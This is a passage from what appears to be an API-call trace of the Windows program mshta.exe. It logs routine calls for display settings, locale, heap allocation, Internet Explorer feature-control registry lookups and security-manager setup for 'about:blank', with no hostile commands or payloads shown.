0x4010b37 [0048.510] GetDeviceCaps (hdc=0x4010b37, index=90) returned 96 [0048.510] GetDeviceCaps (hdc=0x4010b37, index=88) returned 96 [0048.510] GetSystemMetrics (nIndex=68) returned 4 [0048.510] GetSystemMetrics (nIndex=69) returned 4 [0048.510] GetSystemMetrics (nIndex=2) returned 17 [0048.510] GetSystemMetrics (nIndex=3) returned 17 [0048.510] GetStockObject (i=13) returned 0x18a002e [0048.510] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x18a002e [0048.510] GetTextMetricsW (in: hdc=0x4010b37, lptm=0x30e170 | out: lptm=0x30e170) returned 1 [0048.510] SelectObject (hdc=0x4010b37, h=0x18a002e) returned 0x18a002e [0048.510] DeleteObject (ho=0x18a002e) returned 1 [0048.510] GetSystemDefaultLCID () returned 0x409 [0048.510] GetUserDefaultLCID () returned 0x409 [0048.510] GetACP () returned 0x4e4 [0048.510] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x30e0c0, cchData=41 | out: lpLCData="1") returned 2 [0048.510] _wtoi (_String="1") returned 1 [0048.510] RegCloseKey (hKey=0x0) returned 0x6 [0048.511] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x30e0a0, cchData=16 | out: lpLCData="0123456789") returned 11 [0048.511] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7fef00069c4, fWinIni=0x0 | out: pvParam=0x7fef00069c4) returned 1 [0048.511] SystemParametersInfoW (in: uiAction=0x42, uiParam=0x10, pvParam=0x30e160, fWinIni=0x0 | out: pvParam=0x30e160) returned 1 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x100) returned 0x433a30 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420990 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf0) returned 0x433b40 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e1c0 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x42e1f0 [0048.511] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x88) returned 0x433c40 [0048.511] GetSystemWindowsDirectoryW (in: lpBuffer=0x30df90, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0048.511] lstrlenW (lpString="C:\\Windows") returned 10 [0048.511] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0048.511] CreateActCtxW (pActCtx=0x30df50) returned 0x433cd8 [0048.515] ActivateActCtx (in: hActCtx=0x433cd8, lpCookie=0x30df08 | out: hActCtx=0x433cd8, lpCookie=0x30df08) returned 1 [0048.516] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7fefc250000 [0049.532] DeactivateActCtx (dwFlags=0x0, ulCookie=0x11c2087100000001) returned 1 [0049.532] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0049.532] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0049.532] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0049.532] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0049.533] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30e0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0049.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30ddd0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0049.533] GetCurrentProcess () returned 0xffffffffffffffff [0049.533] GetModuleBaseNameW (in: hProcess=0xffffffffffffffff, hModule=0x0, lpBaseName=0x30dbc0, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0049.533] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe" [0049.533] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x14) returned 0x4209d0 [0049.533] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0049.533] SHGetValueW (in: hkey=0xffffffff80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x30dbb8, pvData=0x30dbb4, pcbData=0x30dbb0*=0x4 | out: pdwType=0x30dbb8*=0x0, pvData=0x30dbb4, pcbData=0x30dbb0*=0x4) returned 0x2 [0049.534] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30daa8 | out: phkResult=0x30daa8*=0x124) returned 0x0 [0049.534] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30dab0 | out: phkResult=0x30dab0*=0x120) returned 0x0 [0049.534] RegOpenKeyExW (in: hKey=0x120, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x30da38 | out: phkResult=0x30da38*=0x0) returned 0x2 [0049.534] RegOpenKeyExW (in: hKey=0x124, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x30da38 | out: phkResult=0x30da38*=0x0) returned 0x2 [0049.534] RegCloseKey (hKey=0x0) returned 0x6 [0049.534] RegCloseKey (hKey=0x0) returned 0x6 [0049.534] RegCloseKey (hKey=0x124) returned 0x0 [0049.534] RegCloseKey (hKey=0x120) returned 0x0 [0049.535] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xdc0) returned 0x435570 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x500) returned 0x436340 [0049.536] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0049.536] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0049.536] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0049.536] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x436850 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x436900 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4369b0 [0049.536] GetCurrentThreadId () returned 0xf14 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e370 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x4189c0 [0049.536] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x100) returned 0x436a60 [0049.536] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc172 [0049.537] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x42e3a0 [0049.537] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0049.537] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7fef00048f8, dwReserved=0x0 | out: ppSM=0x7fef00048f8*=0x436b70) returned 0x0 [0049.541] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x98) returned 0x437200 [0049.541] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x78) returned 0x414200 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x418a10 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e3d0 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41ad50 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41adc0 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4372a0 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x64) returned 0x41ae30 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41aea0 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x437330 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf8) returned 0x437650 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41af10 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41af80 [0049.542] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41aff0 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x43b620 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x64) returned 0x41b060 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41b0d0 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41b140 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc0) returned 0x43b6b0 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x280) returned 0x43b780 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x420a30 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x418a60 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x42e400 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x158) returned 0x43ba10 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x68) returned 0x41b1b0 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x250) returned 0x43bb70 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x220) returned 0x43bdd0 [0049.543] GetCurrentThreadId () returned 0xf14 [0049.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x43c000 [0049.544] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x42e430 [0049.544] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x30de40 | out: ppURI=0x30de40*=0x42cf10) returned 0x0 [0049.544] IUri:GetPropertyDWORD (in: This=0x42cf10, uriProp=0x11, pdwProperty=0x30de38, dwFlags=0x0 | out: pdwProperty=0x30de38*=0x11) returned 0x0 [0049.544] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x435f88, dwReserved=0x0 | out: ppSM=0x435f88*=0x43c0b0) returned 0x0 [0049.544] IInternetSecurityManager:SetSecuritySite (This=0x43c0b0, pSite=0x435f98) returned 0x0 [0049.544] IUnknown:AddRef (This=0x435f98) returned 0x28 [0049.544] IUnknown:QueryInterface (in: This=0x435f98, riid=0x7fefdbfe970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x30dd90 | out: ppvObject=0x30dd90*=0x435fa0) returned 0x0 [0049.544] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x43c0f8 | out: ppvObject=0x43c0f8*=0x0) returned 0x80004002 [0049.545] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x43c0f0 | out: ppvObject=0x43c0f0*=0x0) returned 0x80004002 [0049.545] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x43c0e8 | out: ppvObject=0x43c0e8*=0x0) returned 0x80004002 [0049.545] IUnknown:Release (This=0x435fa0) returned 0x0 [0049.545] IInternetSecurityManager:GetSecurityId (in: This=0x43c0b0, pwszUrl="about:blank", pbSecurityId=0x30def0, pcbSecurityId=0x30dee0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x30def0*=0x61, pcbSecurityId=0x30dee0*=0xf) returned 0x0 [0049.564] DllGetClassObject (in: rclsid=0x431f40*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x30cf70*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30c270 | out: ppv=0x30c270*=0x7fef0004fa0) returned 0x0 [0049.564] IUnknown:AddRef (This=0x7fef0004fa0) returned 0x1 [0049.564] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.564] IUnknown:QueryInterface (in: This=0x7fef0004fa0, riid=0x7fefdbf8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x30d1f0 | out: ppvObject=0x30d1f0*=0x7fef0004fa0) returned 0x0 [0049.564] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.564] IUnknown:QueryInterface (in: This=0x7fef0004fa0, riid=0x7fefdc01978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30d720 | out: ppvObject=0x30d720*=0x7fef0004fb8) returned 0x0 [0049.565] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.565] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x42e5e0 [0049.565] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.565] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e5e0 | out: hHeap=0x3f0000) returned 1 [0049.565] IUnknown:Release (This=0x7fef0004fb8) returned 0x1 [0049.565] DllGetClassObject (in: rclsid=0x431f40*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefdbf8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d4e0 | out: ppv=0x30d4e0*=0x7fef0004fa0) returned 0x0 [0049.565] IUnknown:QueryInterface (in: This=0x7fef0004fa0, riid=0x7fefdc01978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30d720 | out: ppvObject=0x30d720*=0x7fef0004fb8) returned 0x0 [0049.565] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.565] IInternetProtocolInfo:ParseUrl (in: This=0x7fef0004fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x420af0, cchResult=0xc, pcchResult=0x30d788, dwReserved=0x0 | out: pwzResult="", pcchResult=0x30d788*=0x0) returned 0x800c0011 [0049.565] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.565] IUnknown:Release (This=0x7fef0004fb8) returned 0x1 [0049.566] IUnknown:Release (This=0x42cf10) returned 0x2 [0049.566] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.566] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf) returned 0x420a70 [0049.566] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420b30 [0049.566] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x30dea0, dwReserved=0x0 | out: ppSM=0x30dea0*=0x43ec60) returned 0x0 [0049.566] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf) returned 0x420b90 [0049.566] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x445570 [0049.566] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30dfe8 | out: phkResult=0x30dfe8*=0x17c) returned 0x0 [0049.566] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30dff0 | out: phkResult=0x30dff0*=0x184) returned 0x0 [0049.567] RegOpenKeyExW (in: hKey=0x184, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x30df78 | out: phkResult=0x30df78*=0x0) returned 0x2 [0049.567] RegOpenKeyExW (in: hKey=0x17c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x30df78 | out: phkResult=0x30df78*=0x0) returned 0x2 [0049.567] RegCloseKey (hKey=0x0) returned 0x6 [0049.567] RegCloseKey (hKey=0x0) returned 0x6 [0049.567] RegCloseKey (hKey=0x17c) returned 0x0 [0049.567] RegCloseKey (hKey=0x184) returned 0x0 [0049.567] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x250) returned 0x447540 [0049.567] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x445600 [0049.567] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420bb0 [0049.567] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2000) returned 0x4477a0 [0049.577] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4497b0 [0049.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497b0 | out: hHeap=0x3f0000) returned 1 [0049.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.578] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x30dca0 | out: ppURI=0x30dca0*=0x42cf10) returned 0x0 [0049.658] DllGetClassObject (in: rclsid=0x431f40*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefdbf8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d2a0 | out: ppv=0x30d2a0*=0x7fef0004fa0) returned 0x0 [0049.658] IUnknown:QueryInterface (in: This=0x7fef0004fa0, riid=0x7fefdc01978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30d4e0 | out: ppvObject=0x30d4e0*=0x7fef0004fb8) returned 0x0 [0049.658] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.658] IInternetProtocolInfo:ParseUrl (in: This=0x7fef0004fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x420bd0, cchResult=0xc, pcchResult=0x30d520, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x30d520*=0xc) returned 0x0 [0049.658] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x42e5e0 [0049.659] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.659] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e5e0 | out: hHeap=0x3f0000) returned 1 [0049.659] IUnknown:Release (This=0x7fef0004fb8) returned 0x1 [0049.659] DllGetClassObject (in: rclsid=0x431f40*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefdbf8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d2a0 | out: ppv=0x30d2a0*=0x7fef0004fa0) returned 0x0 [0049.659] IUnknown:QueryInterface (in: This=0x7fef0004fa0, riid=0x7fefdc01978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30d4e0 | out: ppvObject=0x30d4e0*=0x7fef0004fb8) returned 0x0 [0049.659] IUnknown:Release (This=0x7fef0004fa0) returned 0x1 [0049.659] IInternetProtocolInfo:ParseUrl (in: This=0x7fef0004fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x420bd0, cchResult=0xc, pcchResult=0x30d524, dwReserved=0x0 | out: pwzResult="", pcchResult=0x30d524*=0x0) returned 0x800c0011 [0049.659] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0049.659] IUnknown:Release (This=0x7fef0004fb8) returned 0x1 [0049.659] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0049.659] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0049.659] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0049.660] IUnknown:Release (This=0x42cf10) returned 0x2 [0049.660] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x38) returned 0x42f240 [0049.660] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e5e0 [0049.660] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x70) returned 0x414280 [0049.660] GetDC (hWnd=0x0) returned 0x1a010b3a [0049.660] GetDeviceCaps (hdc=0x1a010b3a, index=88) returned 96 [0049.660] ReleaseDC (hWnd=0x0, hDC=0x1a010b3a) returned 1 [0049.660] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0049.915] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e0d8 | out: phkResult=0x30e0d8*=0x180) returned 0x0 [0049.915] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e0e0 | out: phkResult=0x30e0e0*=0x188) returned 0x0 [0049.915] RegOpenKeyExW (in: hKey=0x188, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x30e068 | out: phkResult=0x30e068*=0x0) returned 0x2 [0049.915] RegOpenKeyExW (in: hKey=0x180, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x30e068 | out: phkResult=0x30e068*=0x0) returned 0x2 [0049.915] RegCloseKey (hKey=0x0) returned 0x6 [0049.916] RegCloseKey (hKey=0x0) returned 0x6 [0049.916] RegCloseKey (hKey=0x180) returned 0x0 [0049.916] RegCloseKey (hKey=0x188) returned 0x0 [0049.917] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420c10 [0049.917] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x78) returned 0x414300 [0049.917] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4497b0 [0049.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000 [0049.917] GetProcAddress (hModule=0x776e0000, lpProcName="InitializeSRWLock") returned 0x778384f0 [0049.917] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockExclusive") returned 0x77828020 [0049.917] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockShared") returned 0x778254e0 [0049.917] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77828050 [0049.917] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockShared") returned 0x778254b0 [0049.917] RtlInitializeConditionVariable () returned 0x778254b0 [0049.918] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x58) returned 0x449850 [0049.918] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x58) returned 0x4498b0 [0049.918] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420c30 [0049.918] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x418b00 [0050.075] IUnknown_QueryService (in: punk=0x7fef00026d8, guidService=0x7feefee0508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7feefee0508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x435608 | out: ppvOut=0x435608*=0x0) returned 0x80004005 [0050.075] IUnknown:QueryInterface (in: This=0x7fef00026d8, riid=0x7fefef808e0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x30f460 | out: ppvObject=0x30f460*=0x7fef0002700) returned 0x0 [0050.075] IServiceProvider:QueryService (in: This=0x7fef0002700, guidService=0x7feefee0508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7feefee0508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x435608 | out: ppvObject=0x435608*=0x0) returned 0x80004005 [0050.075] IUnknown:Release (This=0x7fef0002700) returned 0x1 [0050.075] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x449910 [0050.077] IInternetSecurityManager:SetSecuritySite (This=0x43c0b0, pSite=0x435f98) returned 0x0 [0050.077] IUnknown:Release (This=0x435f98) returned 0x0 